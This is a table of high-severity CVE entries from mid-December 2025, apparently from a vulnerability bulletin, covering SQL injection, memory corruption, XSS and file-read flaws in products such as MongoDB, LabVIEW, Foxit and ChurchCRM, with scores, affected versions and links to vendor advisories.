| MongoDB Inc.--MongoDB Server | Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions, MongoDB Server v8.0 versions prior to 8.0.17, MongoDB Server v8.2 versions prior to 8.2.3, MongoDB Server v6.0 versions prior to 6.0.27, MongoDB Server v5.0 versions prior to 5.0.32, MongoDB Server v4.4 versions prior to 4.4.30, MongoDB Server v4.2 versions greater than or equal to 4.2.0, MongoDB Server v4.0 versions greater than or equal to 4.0.0, and MongoDB Server v3.6 versions greater than or equal to 3.6.0. | 2025-12-19 | 7.5 | CVE-2025-14847 | https://jira.mongodb.org/browse/SERVER-115508 |
| brainstormforce--SureForms Contact Form, Payment Form & Other Custom Form Builder | The SureForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form field parameters in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 7.2 | CVE-2025-14855 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e493f01-95db-48ba-8daf-d7ff69df29bf?source=cve https://plugins.trac.wordpress.org/browser/sureforms/tags/2.2.0/assets/build/entries.js https://plugins.trac.wordpress.org/changeset/3423684/sureforms |
| Campcodes--Supplier Management System | A vulnerability was identified in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /admin/add_retailer.php. The manipulation of the argument cmbAreaCode leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-18 | 7.3 | CVE-2025-14877 | VDB-337368 | Campcodes Supplier Management System add_retailer.php sql injection VDB-337368 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715326 | Campcodes Supplier Management System V1.0 SQL Injection https://github.com/ProgramShowMaker/CVE/issues/6 https://www.campcodes.com/ |
| D-Link--DIR-605 | A vulnerability was detected in D-Link DIR-605 202WWB03. Affected by this issue is some unknown functionality of the component Firmware Update Service. Performing manipulation results in command injection. The attack can be initiated remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-18 | 7.2 | CVE-2025-14884 | VDB-337372 | D-Link DIR-605 Firmware Update Service command injection VDB-337372 | CTI Indicators (IOB, IOC, TTP) Submit #715465 | D-Link DIR605 B1v202WWB03 Command Injection https://tzh00203.notion.site/D-Link-DIR605-B1v202WWB03-Command-Injection-in-Firmware-Update-2cab5c52018a80de8df7f427ac2faf0e?source=copy_link https://www.dlink.com/ |
| yuzutech--kroki | due to insufficient sanitazation in Vega's `convert()` function when `safeMode` is enabled and the spec variable is an array. An attacker can craft a malicious Vega diagram specification that will allow them to send requests to any URL, including local file system paths, leading to exposure of sensitive information. | 2025-12-18 | 7.5 | CVE-2025-14896 | https://github.com/yuzutech/kroki/commit/f31093cd8a0a1d6999c43d560f62d1e82d59c77e |
| code-projects--Scholars Tracking System | A vulnerability was determined in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /admin/delete_user.php. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-19 | 7.3 | CVE-2025-14940 | VDB-337520 | code-projects Scholars Tracking System delete_user.php sql injection VDB-337520 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716120 | code-projects Scholars Tracking System V1.0 SQL Injection https://github.com/gx922/CVE/issues/1 https://code-projects.org/ |
| code-projects--Scholars Tracking System | A weakness has been identified in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /delete_post.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. | 2025-12-19 | 7.3 | CVE-2025-14950 | VDB-337586 | code-projects Scholars Tracking System delete_post.php sql injection VDB-337586 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716123 | code-projects Scholars Tracking System V1.0 SQL Injection https://github.com/gx922/CVE/issues/2 https://code-projects.org/ |
| code-projects--Scholars Tracking System | A security vulnerability has been detected in code-projects Scholars Tracking System 1.0. The impacted element is an unknown function of the file /home.php. Such manipulation of the argument post_content leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-19 | 7.3 | CVE-2025-14951 | VDB-337587 | code-projects Scholars Tracking System home.php sql injection VDB-337587 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716185 | code-projects Scholars Tracking System V1.0 SQL Injection https://github.com/gx922/CVE/issues/3 https://code-projects.org/ |
| Campcodes--Supplier Management System | A vulnerability was detected in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /admin/add_category.php. Performing manipulation of the argument txtCategoryName results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2025-12-19 | 7.3 | CVE-2025-14952 | VDB-337588 | Campcodes Supplier Management System add_category.php sql injection VDB-337588 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716440 | Campcodes Supplier Management System V1.0 SQL Injection https://github.com/vivibiubiu/CVE/issues/1 https://www.campcodes.com/ |
| code-projects--Simple Stock System | A weakness has been identified in code-projects Simple Stock System 1.0. This issue affects some unknown processing of the file /market/signup.php. Executing manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-19 | 7.3 | CVE-2025-14959 | VDB-337595 | code-projects Simple Stock System signup.php sql injection VDB-337595 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #717344 | code-projects Simple Stock System V1.0 SQL Injection https://github.com/InorSogeih/Inor/issues/1 https://code-projects.org/ |
| code-projects--Simple Blood Donor Management System | A security vulnerability has been detected in code-projects Simple Blood Donor Management System 1.0. Impacted is an unknown function of the file /editeddonor.php. The manipulation of the argument Name leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-19 | 7.3 | CVE-2025-14960 | VDB-337596 | code-projects Simple Blood Donor Management System editeddonor.php sql injection VDB-337596 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #717374 | code-projects Simple Blood Donor Management System V1.0 SQL Injection https://github.com/lei-loveling/CVE/issues/1 https://code-projects.org/ |
| code-projects--Simple Blood Donor Management System | A vulnerability was detected in code-projects Simple Blood Donor Management System 1.0. The affected element is an unknown function of the file /editedcampaign.php. The manipulation of the argument campaignname results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. | 2025-12-19 | 7.3 | CVE-2025-14961 | VDB-337597 | code-projects Simple Blood Donor Management System editedcampaign.php sql injection VDB-337597 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #717584 | code-projects Simple Blood Donor Management System V1.0 SQL Injection https://github.com/lei-loveling/CVE/issues/2 https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was identified in itsourcecode Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /candidates_report.php. The manipulation of the argument school_year leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2025-12-19 | 7.3 | CVE-2025-14967 | VDB-337602 | itsourcecode Student Management System candidates_report.php sql injection VDB-337602 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718414 | itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/28 https://itsourcecode.com/ |
| code-projects--Simple Stock System | A security flaw has been discovered in code-projects Simple Stock System 1.0. Affected by this issue is some unknown functionality of the file /market/update.php. The manipulation of the argument email results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-19 | 7.3 | CVE-2025-14968 | VDB-337603 | code-projects Simple Stock System update.php sql injection VDB-337603 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718433 | Code-projects Simple Stock System v1.0 SQL injection https://github.com/z2sw57y/CVE/issues/1 https://code-projects.org/ |
| Campcodes--Complete Online Beauty Parlor Management System | A vulnerability was identified in Campcodes Complete Online Beauty Parlor Management System 1.0. This issue affects some unknown processing of the file /admin/search-invoices.php. Such manipulation leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2025-12-20 | 7.3 | CVE-2025-14989 | VDB-337683 | Campcodes Complete Online Beauty Parlor Management System search-invoices.php sql injection VDB-337683 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718452 | campcodes Complete Online Beauty Parlor Management System V1.0 SQL Injection https://github.com/funnnxxx/my-cve/issues/3 https://www.campcodes.com/ |
| Campcodes--Complete Online Beauty Parlor Management System | A security flaw has been discovered in Campcodes Complete Online Beauty Parlor Management System 1.0. Impacted is an unknown function of the file /admin/view-appointment.php. Performing manipulation of the argument viewid results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-21 | 7.3 | CVE-2025-14990 | VDB-337684 | Campcodes Complete Online Beauty Parlor Management System view-appointment.php sql injection VDB-337684 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718453 | campcodes Complete Online Beauty Parlor Management System V1.0 SQL Injection https://github.com/funnnxxx/my-cve/issues/2 https://www.campcodes.com/ |
| SeaCMS--SeaCMS | A vulnerability has been found in SeaCMS up to 13.3. The affected element is an unknown function of the file js/player/dmplayer/dmku/class/mysqli.class.php. Such manipulation of the argument page/limit leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-12-21 | 7.3 | CVE-2025-15002 | VDB-337707 | SeaCMS mysqli.class.php sql injection VDB-337707 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716083 | SeaCMS 13.3 SQL Injection https://note-hxlab.wetolink.com/share/VFwALb6qhnTZ |
| Restajet Information Technologies Inc.--Online Food Delivery System | Cross-Site Request Forgery (CSRF) vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Cross Site Request Forgery.This issue affects Online Food Delivery System: through 19122025. | 2025-12-19 | 7.1 | CVE-2025-1927 | https://www.usom.gov.tr/bildirim/tr-25-0469 |
| Qualcomm, Inc.--Snapdragon | Memory corruption during video playback when video session open fails with time out error. | 2025-12-18 | 7.8 | CVE-2025-27063 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| NVIDIA--NeMo Framework | NVIDIA NeMo Framework contains a vulnerability in model loading that could allow an attacker to exploit improper control mechanisms if a user loads a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, and data tampering. | 2025-12-16 | 7.3 | CVE-2025-33212 | https://nvd.nist.gov/vuln/detail/CVE-2025-33212 https://www.cve.org/CVERecord?id=CVE-2025-33212 https://nvidia.custhelp.com/app/answers/detail/a_id/5736 |
| NVIDIA--NeMo Framework | NVIDIA NeMo Framework for all platforms contains a vulnerability where malicious data created by an attacker may cause a code injection. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-12-16 | 7.8 | CVE-2025-33226 | https://nvd.nist.gov/vuln/detail/CVE-2025-33226 https://www.cve.org/CVERecord?id=CVE-2025-33226 https://nvidia.custhelp.com/app/answers/detail/a_id/5736 |
| NVIDIA--Resiliency Extension | NVIDIA Resiliency Extension for Linux contains a vulnerability in the checkpointing core, where an attacker may cause a race condition. A successful exploit of this vulnerability might lead to information disclosure, data tampering, denial of service, or escalation of privileges. | 2025-12-16 | 7.8 | CVE-2025-33235 | https://nvd.nist.gov/vuln/detail/CVE-2025-33235 https://www.cve.org/CVERecord?id=CVE-2025-33235 https://nvidia.custhelp.com/app/answers/detail/a_id/5746 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing MFC channel configuration during music playback. | 2025-12-18 | 7.8 | CVE-2025-47320 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while copying packets received from unix clients. | 2025-12-18 | 7.8 | CVE-2025-47321 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling IOCTL calls to set mode. | 2025-12-18 | 7.8 | CVE-2025-47322 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while routing GPR packets between user and root when handling large data packet. | 2025-12-18 | 7.8 | CVE-2025-47323 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling concurrent memory mapping and unmapping requests from a user-space application. | 2025-12-18 | 7.8 | CVE-2025-47350 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while loading an invalid firmware in boot loader. | 2025-12-18 | 7.8 | CVE-2025-47382 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing IOCTLs for JPEG data without verification. | 2025-12-18 | 7.8 | CVE-2025-47387 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the RLECodec::DecodeByStreams functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to leaking heap data. An attacker can provide a malicious file to trigger this vulnerability. | 2025-12-16 | 7.4 | CVE-2025-48429 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2214 |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the Overlay::GrabOverlayFromPixelData functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability. | 2025-12-16 | 7.4 | CVE-2025-52582 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2211 |
| Fuji Electric--Monitouch V-SFT-6 | Fuji Electric Monitouch V-SFT-6 is vulnerable to an out-of-bounds write while processing a specially crafted project file, which may allow an attacker to execute arbitrary code. | 2025-12-17 | 7.8 | CVE-2025-53524 | https://felib.fujielectric.co.jp/en/document_search?tab=software&document1%5B1%5D=M10009&document2%5B1%5D=M20104&product1%5B1%5D=P10003&product2%5B1%5D=P20023&product3%5B1%5D=P30623&product4%5B1%5D=S11133&discontinued%5B1%5D=0&count=20&sort=en_title&page=1®ion=en-glb https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-01.json |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the JPEGBITSCodec::InternalCode functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability.The function `grayscale_convert` is called based of the value of the malicious DICOM file specifying the intended interpretation of the image pixel data | 2025-12-16 | 7.4 | CVE-2025-53618 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2210 |
| Grassroot DICOM--Grassroot DICOM | An out-of-bounds read vulnerability exists in the JPEGBITSCodec::InternalCode functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability.The function `null_convert` is called based of the value of the malicious DICOM file specifying the intended interpretation of the image pixel data | 2025-12-16 | 7.4 | CVE-2025-53619 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2210 |
| Palantir--com.palantir.compute:compute-service | Due to a product misconfiguration in certain deployment types, it was possible from different pods in the same namespace to communicate with each other. This issue resulted in bypass of access control due to the presence of a vulnerable endpoint in Foundry Container Service that executed user-controlled commands locally. | 2025-12-18 | 7.5 | CVE-2025-53710 | https://palantir.safebase.us/?tcuUid=4dbae101-79da-433c-8184-c70b78f4701b |
| BullWall--Ransomware Containment | BullWall Ransomware Containment does not entirely inspect a file to determine if it is ransomware. An authenticated attacker could bypass detection by encrypting a file and leaving the first four bytes unaltered. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 7.1 | CVE-2025-62000 | url url |
| NI--LabVIEW | There is an out of bounds write vulnerability in NI LabVIEW in mgocre_SH_25_3!RevBL() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64461 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in LVResFile::RGetMemFileHandle() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64462 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in LVResource::DetachResource() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64463 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in lvre!VisaWriteFromFile() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64464 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in lvre!DataSizeTDR() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64465 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in lvre!ExecPostedProcRecPost() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64466 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is an out of bounds read vulnerability in NI LabVIEW in LVResFile::FindRsrcListEntry() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64467 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a use-after-free vulnerability in sentry!sentry_span_set_data() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions | 2025-12-18 | 7.8 | CVE-2025-64468 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a stack-based buffer overflow vulnerability in NI LabVIEW in LVResFile::FindRsrcListEntry() when parsing a corrupted VI file. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q3 (25.3) and prior versions. | 2025-12-18 | 7.8 | CVE-2025-64469 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/multiple-memory-corruption-vulnerabilities-in-ni-labview.html |
| Microsoft--Microsoft Purview | '.../...//' in Microsoft Purview allows an authorized attacker to execute code over a network. | 2025-12-18 | 7.2 | CVE-2025-64676 | Microsoft Purview eDiscovery Remote Code Execution Vulnerability |
| OSC--ondemand | Open OnDemand provides remote web access to supercomputers. In versions 4.0.8 and prior, the Apache proxy allows sensitive headers to be passed to origin servers. This means malicious users can create an origin server on a compute node that record these headers when unsuspecting users connect to it. Maintainers anticipate a patch in a 4.1 release. Workarounds exist for 4.0.x versions. Using `custom_location_directives` in `ood_portal.yml` in version 4.0.x (not available for versions below 4.0) centers can unset and or edit these headers. Note that `OIDCPassClaimsAs both` is the default and centers can set `OIDCPassClaimsAs ` to `none` or `environment` to stop passing these headers to the client. Centers that have an OIDC provider with the `OIDCPassClaimsAs` with `none` or `environment` settings can adjust the settings using guidance provided in GHSA-2cwp-8g29-9q32 to unset the mod_auth_openidc_session cookies. | 2025-12-17 | 7.6 | CVE-2025-66029 | https://github.com/OSC/ondemand/security/advisories/GHSA-2cwp-8g29-9q32 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/UserEditor.php` file. When an administrator saves a user's configuration settings, the keys of the `type` POST parameter array are not properly sanitized or type-casted before being used in multiple SQL queries. This allows a malicious or compromised administrator account to execute arbitrary SQL commands, including time-based blind SQL injection attacks, to directly interact with the database. The vulnerability is located in `src/UserEditor.php` within the logic that handles saving user-specific configuration settings. The `type` parameter from the POST request is processed as an array. The code iterates through this array and uses `key($type)` to extract the array key, which is expected to be a numeric ID. This key is then assigned to the `$id` variable. The `$id` variable is subsequently concatenated directly into a `SELECT` and an `UPDATE` SQL query without any sanitization or validation, making it an injection vector. Although the vulnerability requires administrator privileges to exploit, it allows a malicious or compromised admin account to execute arbitrary SQL queries. This can be used to bypass any application-level logging or restrictions, directly manipulate the database, exfiltrate, modify, or delete all data (including other user credentials, financial records, and personal information), and could potentially lead to further system compromise, such as writing files to the server, depending on the database's configuration and user privileges. Version 6.5.3 patches the issue. | 2025-12-17 | 7.2 | CVE-2025-66396 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-whpp-wx64-4qp9 |
| Foxit Software Inc.--Foxit PDF Editor | A use-after-free vulnerability exists in the AcroForm handling of Foxit PDF Reader and Foxit PDF Editor before 2025.2.1,14.0.1 and 13.2.1 on Windows . When opening a PDF containing specially crafted JavaScript, a pointer to memory that has already been freed may be accessed or dereferenced, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66493 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A use-after-free vulnerability exists in the PDF file parsing of Foxit PDF Reader before 2025.2.1, 14.0.1, and 13.2.1 on Windows. A PDF object managed by multiple parent objects could be freed while still being referenced, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66494 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A use-after-free vulnerability exists in the annotation handling of Foxit PDF Reader before 2025.2.1, 14.0.1, and 13.2.1 on Windows and MacOS. When opening a PDF containing specially crafted JavaScript, a pointer to memory that has already been freed may be accessed or dereferenced, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66495 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A heap-based buffer overflow vulnerability exists in the PDF parsing of Foxit PDF Reader when processing specially crafted JBIG2 data. An integer overflow in the calculation of the image buffer size may occur, potentially allowing a remote attacker to execute arbitrary code. | 2025-12-19 | 7.8 | CVE-2025-66499 | https://www.foxit.com/support/security-bulletins.html |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to version 1.45.3, it was possible to craft an input which allowed privilege escalation and getting access to groups of other users due to missing sanitization of inputs in ldap search query. The vulnerability could impact all instances using ldap authentication where a malicious actor had access to a user account. Version 1.45.3 has a patch for the issue. | 2025-12-17 | 7.5 | CVE-2025-67493 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-59gp-q3xx-489q |
| Aiven-Open--myhoard | MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into /dev/null. | 2025-12-18 | 7.1 | CVE-2025-67745 | https://github.com/Aiven-Open/myhoard/security/advisories/GHSA-v42r-6hr9-4hcr https://github.com/Aiven-Open/myhoard/commit/fac89793bfc8c81ae040aadf5292f5d0100b6640 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.0, a SQL injection vulnerability exists in the `EventEditor.php` file. When creating a new event and selecting an event type, the `EN_tyid` POST parameter is not sanitized. This allows an authenticated user with event management permissions (`isAddEvent`) to execute arbitrary SQL queries. Version 6.5.0 fixes the issue. | 2025-12-16 | 7.2 | CVE-2025-67751 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-wxcc-gvfv-56fg https://github.com/ChurchCRM/CRM/commit/2d6cf7aed9af1b9b47e125d1a2266f8e2a88f3fd |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.3, a SQL injection vulnerability exists in the `eGive.php` file within the "ReImport" functionality. An authenticated user with finance privileges can execute arbitrary SQL queries by manipulating the `MissingEgive_FamID_...` POST parameter. This can lead to unauthorized data access, modification, or deletion within the database. Version 6.5.3 has a patch for the issue. | 2025-12-17 | 7.2 | CVE-2025-68111 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c4vm-87vf-hmx9 |
| vitejs--vite-plugin-react | @vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Prior to version 0.5.8, the `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. Version 0.5.8 fixes the issue. | 2025-12-16 | 7.5 | CVE-2025-68155 | https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm https://github.com/facebook/react/pull/29708 https://github.com/facebook/react/pull/30741 https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d |
| expr-lang--expr | Expr is an expression language and expression evaluation for Go. Prior to version 1.17.7, several builtin functions in Expr, including `flatten`, `min`, `max`, `mean`, and `median`, perform recursive traversal over user-provided data structures without enforcing a maximum recursion depth. If the evaluation environment contains deeply nested or cyclic data structures, these functions may recurse indefinitely until exceed the Go runtime stack limit. This results in a stack overflow panic, causing the host application to crash. While exploitability depends on whether an attacker can influence or inject cyclic or pathologically deep data into the evaluation environment, this behavior represents a denial-of-service (DoS) risk and affects overall library robustness. Instead of returning a recoverable evaluation error, the process may terminate unexpectedly. In affected versions, evaluation of expressions that invoke certain builtin functions on untrusted or insufficiently validated data structures can lead to a process-level crash due to stack exhaustion. This issue is most relevant in scenarios where Expr is used to evaluate expressions against externally supplied or dynamically constructed environments; cyclic references (directly or indirectly) can be introduced into arrays, maps, or structs; and there are no application-level safeguards preventing deeply nested input data. In typical use cases with controlled, acyclic data, the issue may not manifest. However, when present, the resulting panic can be used to reliably crash the application, constituting a denial of service. The issue has been fixed in the v1.17.7 versions of Expr. The patch introduces a maximum recursion depth limit for affected builtin functions. When this limit is exceeded, evaluation aborts gracefully and returns a descriptive error instead of panicking. Additionally, the maximum depth can be customized by users via `builtin.MaxDepth`, allowing applications with legitimate deep structures to raise the limit in a controlled manner. Users are strongly encouraged to upgrade to the patched release, which includes both the recursion guard and comprehensive test coverage to prevent regressions. For users who cannot immediately upgrade, some mitigations are recommended. Ensure that evaluation environments cannot contain cyclic references, validate or sanitize externally supplied data structures before passing them to Expr, and/or wrap expression evaluation with panic recovery to prevent a full process crash (as a last-resort defensive measure). These workarounds reduce risk but do not fully eliminate the issue without the patch. | 2025-12-16 | 7.5 | CVE-2025-68156 | https://github.com/expr-lang/expr/security/advisories/GHSA-cfpf-hrx2-8rv6 https://github.com/expr-lang/expr/pull/870 |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to read arbitrary files from the server file system using crafted symbolic links in the repository. Version 5.15.1 fixes the issue. | 2025-12-18 | 7.7 | CVE-2025-68279 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-g925-f788-4jh7 https://github.com/WeblateOrg/weblate/pull/17331 https://github.com/WeblateOrg/weblate/pull/17356 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1 |
| Elastic--Kibana | Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an authenticated user to embed a malicious script in content that will be served to web browsers causing cross-site scripting (XSS) (CAPEC-63) via a method in Vega bypassing a previous Vega XSS mitigation. | 2025-12-18 | 7.2 | CVE-2025-68385 | https://discuss.elastic.co/t/kibana-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-34/384182 |
